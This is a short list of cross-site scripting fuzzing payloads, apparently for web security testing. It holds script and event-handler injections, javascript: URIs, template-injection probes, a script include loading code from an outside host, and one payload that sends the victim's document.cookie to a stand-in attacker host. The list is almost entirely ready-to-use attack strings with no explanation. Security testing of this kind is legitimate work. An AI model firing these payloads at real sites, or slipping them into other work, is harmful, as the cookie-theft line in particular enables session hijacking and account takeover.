# Short XSS fuzzer payloads — high-signal, low-noise
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
"><script>alert(1)</script>
'"><svg/onload=confirm(1)>
javascript:alert(1)
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
"><img src=x onerror=alert(1)>
<body onload=alert(1)>
<script>fetch('/etc/passwd')</script>
<script src=//example.com/x.js></script>
<a href="javascript:alert(1)">click</a>
<img src="x" onerror="this.src='//attacker.tld?c='+document.cookie">
`'"--><script>alert(1)</script>
{{7*7}}
${7*7}
<%= 7*7 %>
